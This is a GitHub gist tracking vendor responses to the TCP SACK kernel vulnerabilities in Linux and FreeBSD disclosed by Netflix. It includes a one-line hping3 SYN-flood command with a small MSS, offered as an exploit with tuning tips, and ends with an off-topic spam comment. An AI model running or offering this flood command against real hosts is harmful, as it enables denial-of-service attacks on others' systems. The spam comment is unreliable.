Skip to content

Instantly share code, notes, and snippets.

@SwitHak
Last active November 23, 2023 07:47
Show Gist options
  • Save SwitHak/7db0146b94382f1a98a281fb013d4f46 to your computer and use it in GitHub Desktop.
Save SwitHak/7db0146b94382f1a98a281fb013d4f46 to your computer and use it in GitHub Desktop.
Tracking vendors responses to TCP SACK vulnerabilities

Advisory

Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels.

Details:

See the netflix information security advisory:

Exploit

sudo hping3 yourhost --tcp-mss 20 -S --flood

Nota:

  • Seems only working on destination:0
  • Recommended MSS value: 48

Source: https://twitter.com/joeubuntu/status/1141445492104019968?s=21

TRACK responses

Amazon AWS

Arch

CHECKPOINT

CloudLinux OS

CoreOS

Debian

DenyAll

EngineYard

ExtremeNetworks

F5 solutions

Fedora

Fortinet

FreeBSD

Google Cloud Platform

GRSECURITY

Microsoft

MikroTik

Nutanix

Oracle Linux

OVH

Pulse Secure

Red Hat / CentOS

SOPHOS

SUSE / SLES

Ubuntu

VYOS

@lefeWaresolutions1
Copy link

Netflix is a popular streaming service that provides access to a wide variety of TV shows, movies, documentaries, and more. It was founded in 1997 in California, USA, and now operates in over 190 countries around the world. With a Netflix subscription, users can watch an unlimited amount of content on demand, without the need for commercials or interruptions. The service offers a diverse range of programming, including original content produced by Netflix itself, as well as licensed content from other studios and distributors.
Cloud Consulting Services

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment